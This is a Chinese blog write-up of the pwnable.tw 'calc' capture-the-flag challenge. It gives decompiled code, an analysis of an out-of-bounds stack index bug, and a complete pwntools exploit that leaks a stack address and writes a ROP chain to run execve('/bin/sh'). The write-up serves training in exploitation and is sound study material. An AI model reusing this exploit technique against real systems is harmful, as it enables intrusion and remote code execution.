pwnable.tw calc writeup

最新推荐文章于 2023-09-22 14:19:55 发布
原创 最新推荐文章于 2023-09-22 14:19:55 发布 · 1.7k 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

题目

main:

int __cdecl main(int argc, const char **argv, const char **envp)
{
  ssignal(14, timeout);
  alarm(60);
  puts("=== Welcome to SECPROG calculator ===");
  fflush(stdout);
  calc();
  return puts("Merry Christmas!");
}

calc:

int calc()
{
  ExprBuf buf; // [sp+18h] [bp-5A0h]@4
  char s; // [sp+1ACh] [bp-40Ch]@2
  int v3; // [sp+5ACh] [bp-Ch]@1

  v3 = *MK_FP(__GS__, 20);
  while ( 1 )
  {
    bzero(&s, 0x400u);
    if ( !get_expr(&s, 1024) )
      break;
    init_pool(&buf);
    if ( parse_expr(&s, &buf) )
    {
      printf((const char *)&output_d_fmt, buf.buf[buf.buf_size - 1]);
      fflush(stdout);
    }
  }
  return *MK_FP(__GS__, 20) ^ v3;
}

initpool:

ExprBuf *__cdecl init_pool(ExprBuf *a1)
{
  ExprBuf *result; // eax@1
  signed int i; // [sp+Ch] [bp-4h]@1

  result = a1;
  a1->buf_size = 0;
  for ( i = 0; i <= 99; ++i )
  {
    result = a1;
    a1->buf[i] = 0;
  }
  return result;
}

parse_expr:

signed int __cdecl parse_expr(char *raw_expr, ExprBuf *expr)
{
  char *idx; // ST2C_4@3
  signed int result; // eax@4
  int expr_idx; // eax@6
  int v5; // ebx@25
  char *v6; // [sp+20h] [bp-88h]@1
  int i; // [sp+24h] [bp-84h]@1
  int stack_ptr; // [sp+28h] [bp-80h]@1
  char *buf; // [sp+30h] [bp-78h]@3
  int num; // [sp+34h] [bp-74h]@5
  char op_s[100]; // [sp+38h] [bp-70h]@1
  int v12; // [sp+9Ch] [bp-Ch]@1

  v12 = *MK_FP(__GS__, 20);
  v6 = raw_expr;
  stack_ptr = 0;
  bzero(op_s, 0x64u);
  for ( i = 0; ; ++i )
  {
    if ( (unsigned int)(raw_expr[i] - '0') > 9 )
    {
      idx = (char *)(&raw_expr[i] - v6);
      buf = (char *)malloc(idx + 1);
      memcpy(buf, v6, idx);
      buf[(_DWORD)idx] = 0;
      if ( !strcmp(buf, "0") )
      {
        puts("prevent division by zero");
        fflush(stdout);
        result = 0;
        goto out;
      }
      num = atoi(buf);
      if ( num > 0 )
      {
        expr_idx = expr->buf_size++;
        expr->buf[expr_idx] = num;
      }
      if ( raw_expr[i] && (unsigned int)(raw_expr[i + 1] - '0') > 9 )
      {
        puts("expression error!");
        fflush(stdout);
        result = 0;
        goto out;
      }
      v6 = &raw_expr[i + 1];
      if ( op_s[stack_ptr] )
      {
        switch ( raw_expr[i] )
        {
          case '+':
          case '-':
            eval(expr, op_s[stack_ptr]);
            op_s[stack_ptr] = raw_expr[i];
            break;
          case '%':
          case '*':
          case '/':
            if ( op_s[stack_ptr] != '+' && op_s[stack_ptr] != '-' )
            {
              eval(expr, op_s[stack_ptr]);
              op_s[stack_ptr] = raw_expr[i];
            }
            else
            {
              op_s[++stack_ptr] = raw_expr[i];
            }
            break;
          default:
            eval(expr, op_s[stack_ptr--]);
            break;
        }
      }
      else
      {
        op_s[stack_ptr] = raw_expr[i];
      }
      if ( !raw_expr[i] )
        break;
    }
  }
  while ( stack_ptr >= 0 )
    eval(expr, op_s[stack_ptr--]);
  result = 1;
out:
  v5 = *MK_FP(__GS__, 20) ^ v12;
  return result;
}

eval:

ExprBuf *__cdecl eval(ExprBuf *a1, char op)
{
  ExprBuf *result; // eax@12

  if ( op == '+' )
  {
    a1->buf[a1->buf_size - 2] += a1->buf[a1->buf_size - 1];
  }
  else if ( op > '+' )
  {
    if ( op == '-' )
    {
      a1->buf[a1->buf_size - 2] -= a1->buf[a1->buf_size - 1];
    }
    else if ( op == '/' )
    {
      a1->buf[a1->buf_size - 2] /= a1->buf[a1->buf_size - 1];
    }
  }
  else if ( op == '*' )
  {
    a1->buf[a1->buf_size - 2] *= a1->buf[a1->buf_size - 1];
  }
  result = a1;
  --a1->buf_size;
  return result;
}

struct:

struct ExprBuf
{
  int buf_size;
  int buf[100];
};

分析

题目逻辑还是有点麻烦的,虽然明知道就是两个栈实现的表达式计算。。
基本逻辑就是首先看是不是数字,如果不是数字进入逻辑开始处理,将之前的认做数字进行转换,然后放到栈上,其他部分也是相应的表达式计算的基本实现,具体看逻辑就好

漏洞位置:
1. 逻辑漏洞,没有进行边界检查导致存放数字结果的栈存在越界情况(eval中),通过一开始直接开始符号而不是数字则可以触发漏洞
2. 输出的时候按栈结果输出,刚好可以输出到越界被更改的部分
3. 栈顶指针位于栈之前,越界后刚好可以更改到

这里主要的漏洞原因是在只有一个数字一个符号的时候,会试图进行计算:

+-----+------+
| top | num1 |  <--- 数字栈
+-----+------+

+-----+
|sign1|  <--- 符号栈
+-----+

这个时候进行计算,于是会使用top指针来作为另一个操作数,这个时候保存的值会存在buf[top]的位置,对于一开始的时候,比如直接进行`+100`,那么将会将100加到top上,如果之后还有其他操作,将会更改`buf[top]`的值,top已经被控制了,所以造成了任意写

利用思路:
1. 泄露一个栈指针,获得栈地址
2. 我们已经有办法进行任意写了,不过需要注意的是,这里只能进行加减操作,也就是不是直接设置,而是在该值上进行加减任意值,不过还好我们拥有可以泄露的方法,于是就是先泄露再加减设置成任意值
3. 通过任意写,构造rop,进行execve执行shell。这里其实只需要设置eax为0xb,ebx为”/bin/sh\x00”,ecx, edx都为NULL就可以(argv可以为NULL)

另外写exp还需要注意一个点,由于加减存在溢出,需要谨慎处理加减情况,避免溢出之后和所想要的值不一样,以及需要注意不能先泄露所有值再写,可能不一致

exp

import sys
from pwn import *
context(os='linux', arch='i386', log_level='debug')

GDB = 1
if len(sys.argv) > 2:
    p = remote(sys.argv[1], int(sys.argv[2]))
else:
    p = process("./calc")


current_val = {}

def write(addr, content):

    p.sendline('+' + str(addr))
    current_val[addr] = get_val(int(p.recvline()[:-1]))
    p.info('current {} = {}'.format(addr, hex(current_val[addr])))

    curr = current_val

    payload = '+' + str(addr)
    val = content - curr[addr]
    if val < 0:
        payload += '-' + str(abs(val))
    elif val > 0x7fffffff:
        payload += '-' + str(0xffffffff - val + 1)
    else:
        payload += '+' + str(val)
    p.sendline(payload)
    receved = get_val(int(p.recvline()[:-1]))
    if receved != content:
        p.info('not right! received {} content {}'.format(hex(receved), hex(content)))
        raise Exception('not successful')

def get_val(x):
    if x < 0:
        return 0xffffffff + x + 1
    else:
        return x

def main():
    if GDB:
        raw_input()
    current_val = {}
    p.recvuntil('r ===')
    p.sendline('+360')
    p.recvline()
    stack_leak = 0xffffffff + int(p.recvline()[:-1]) + 1
    start_pos = stack_leak - 0x20 # +360
    p.info('start pos {}'.format(hex(start_pos)))
    current_val[360] = stack_leak
    # +361 -> return_address
    # stack:
    # 360 => start_pos(leaked)
    # 361 => 0x080701d1 : pop ecx ; pop ebx ; ret
    # 362 => 0
    # 363 => ebx : start_pos + 36
    # 364 => 0x0805c34b : pop eax ; ret
    # 365 => eax : 0xb
    # 366 => 0x080701aa : pop edx ; ret
    # 367 => 0
    # 368 => 0x08049a21 : int 0x80
    # 369 => 0x6e69622f /bin/sh\x00
    # 370 => 0x68732f
    write(361, 0x080701d1)
    #write(362, start_pos + 36)
    write(362, 0)
    write(363, start_pos + 36)
    write(364, 0x0805c34b)
    write(365, 0xb)
    write(366, 0x080701aa)
    write(367, 0x0)
    write(368, 0x08049a21)
    write(369, 0x6e69622f)
    write(370, 0x68732f)

    p.sendline()

    p.interactive()


if __name__ == "__main__":
    main()
pwnable.tw 1~5 心累
qq_42192672的博客
12-02 696
听说很难,来找虐 1.Start [100 pts] 之前湖湘杯有一题啥防护措施都没开启,我就不会做,所以不敢开心的太早 拖进IDA,这啥东西 还是直接看汇编吧 这是个系统调用 大概就是系统中断之后直接调用吧,边上有注释,不然我直接凉了 来,看一下汇编 先把地址给ecx,给了给长度范围,饭后执行标准输出,输出到终端,然后执行写操作 进入写函数以后,标准读入,长度还是2...
pwnable.tw writeup
钞sir的博客
02-27 4155
start 这道题是静态编译的,或者可以理解是就是直接用汇编写的,所以这个程序很小,没有可以利用的函数; sir@sir-PC:~/desktop$ objdump -R start start: 文件格式 elf32-i386 objdump: start:不是动态对象 objdump: start: 无效的操作 反汇编代码: sir@sir-PC:~/desktop$ objdu...
pwnable.tw calc
weixin_30530339的博客
02-19 135
题目代码量比较大(对于菜鸡我来说orz),找了很久才发现一个能利用的漏洞 运行之发现是一个计算器的程序,简单测试下发现当输入的操作数超过10位时会有一个整型溢出 这里调试了一下发现是printf("%d",num[num-1])时要输出的结果超过了2^31,2147483648即0x80000000,所以这应该算是一个bug并不是一个可利用的漏洞(32位程序最大输出2^31的原因是int类型最...
pwnable.twcalc
最新发布
qq_61670993的博客
09-22 183
逻辑错误导致数组越界
Complex Calc Writeup
子曰小玖的博客
05-23 389
https://sploitfun.wordpress.com/2016/03/07/bkp-ctf-complex-calc-writeup/ This ELF binaryis almost same assimple calcelf with some minor change!! Tofigure out what that change is, I first ran simp...
advanced.scientific.calculator.calc991.plus(1).apk
09-21
advanced.scientific.calculator.calc991.plus(1).apk
us.mathlab.android.calc.edu.apk
06-01
us.mathlab.android.calc.edu.apk
calc.exe下载 calc.exe是什么 calc.exe路径位置
03-18
在计算机领域,Windows操作系统的内置计算器程序“calc.exe”是众多用户耳熟能详的工具之一。尽管它只是操作系统中的一个小工具,却在日常生活中扮演了重要的角色。本文将深入探讨calc.exe的含义、下载途径、源码和...
my_calc.rar_calc
09-24
首先,我们来理解“my_calc.rar_calc”这一标题。这里的“my_calc”是开发者为这个科学计算器项目所起的名称,可能代表“我的计算器”之意。而“rar_calc”则可能表明这个项目是以RAR压缩格式存储,且包含一个名为...
calc_angle.rar_calc wheel angle
09-24
"calc_angle.rar_calc wheel angle" 提供的资源显然与计算车轮的角度有关,这可能是为了分析车辆动态、机械设计或者游戏引擎中的物理模拟。"CALC INTERCEPT ANGLE" 进一步暗示我们这个程序或脚本用于计算截距角,这...
pwnable.tw start writeup
jmp esp
09-27 1546
题目.text:08048060 .text:08048060 public _start .text:08048060 _start proc near .text:08048060 push esp .text:08048061 push offset _exit .te
pwnable.tw-calc详解
qq_35661990的博客
01-06 1054
重点需要的知识:ROP链的构造、栈中ebp和esp的变换 这题颠覆了我原本以为pwn都是各种套路的思想,和pwn只需要关注危险函数的思想,栈溢出并不是只有各种ret技术,恐怕堆溢出也不仅仅局限于各种heap of技术,那些只是基础。 int __cdecl main(int argc, const char **argv, const char **envp) { ssignal(14,...
pwnable.tw calc 经验总结
qq_43189757的博客
10-22 817
代码写的少, 弄清楚程序逻辑都得盯好久… 程序逻辑: 如题目名字所写, 程序的功能就是实现一个简单计算器的功能 相关函数介绍: 1.get_expr 函数功能为读取计算的表达式, 运算符只包括+ , - , *, /, %五种, 除了运算符和参加运算的数据之外的字符都不会被读取 2.parse_expr 函数功能为对表达式进行解析 传入的参数a1 为表达式的地址 a2 为calc函数中变量v...
Pwnable.tw orw [Writeup]
柷敔的博客
02-18 666
题源 https://pwnable.tw/challenge/#2 题解 先看一下安全保护情况 再IDA一下源码 其中seccomp是一个开启内核system call保护的函数。通过这一函数可以划定程序准许用户态调用的系统函数,相当于划定白名单,即题目所言【仅开启了open、write、read】。 简单分析函数可知,该程序直接执行了用户输入的shellcode。结合题目意思,可以使用open函数打开flag文件,然后read读出文件内容,最后write输出到控制台。 使用的python程序如下:
pwnable.tw orw writeup
jmp esp
09-27 1986
题目题目比较简单就不复制了,首先seccomp设置了白名单,然后输入0xc8长度shellcode,直接跳到shellcode执行。分析既然是练习,就要彻底一点。 首先是seccomp dump的问题,目前采用的方法是IDApython脚本dump数据下来,然后输入scmp_bpf_disasm。IDApython的文档非常诡异,函数没有说明,函数的参数也不能直接看出来,所以搜了很长时间找了一个别
pwnable tw Death Note writeup
charlie_heng的专栏
03-01 1183
pwnable tw的题做到后面越来越骚了……脑洞太大… 这题其实是printable shellcode 一开始完全没思路,后面搜了下,发现了一个神器 https://github.com/VincentDary/PolyAsciiShellGen 能将shellcode转化为可打印字符 看了下生成的shellcode,发现其实它是利用 sub eax,xxxx 来将eax设置为任意值,...
Pwnable.tw start [Writeup]
柷敔的博客
02-18 1130
Pwnable.tw start [Writeup] 题源 https://pwnable.tw/challenge/#1 题解 先看一下安全保护情况 再dump一下源码 拖到IDA里一看,也就是内联汇编写的代码(此处略去)。毕竟是入门第一题,都是用的简单的汇编指令。简单注释一下: [line 1]08048060 <_start>: [line 2] 8048060: 54 push %esp ; 泄露了栈地
pwnable tw Starbound writeup
charlie_heng的专栏
03-02 1014
这题漏洞很明显,选择菜单的时候可以输入负数,然后可以在name那里填入想调用的函数,这样就可以实现任意地址执行 但是有了这个之后怎么用呢?? 这个就有点难度了,本来是想看一下栈,看看有没有可以用的参数,但是发现基本都用不了……. 然后想了下,这题没有给libc,又没有system,那么多半是ret2dl_resolve 那么ret2dl_resolve又需要rop,那么这题应该就是rop了...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值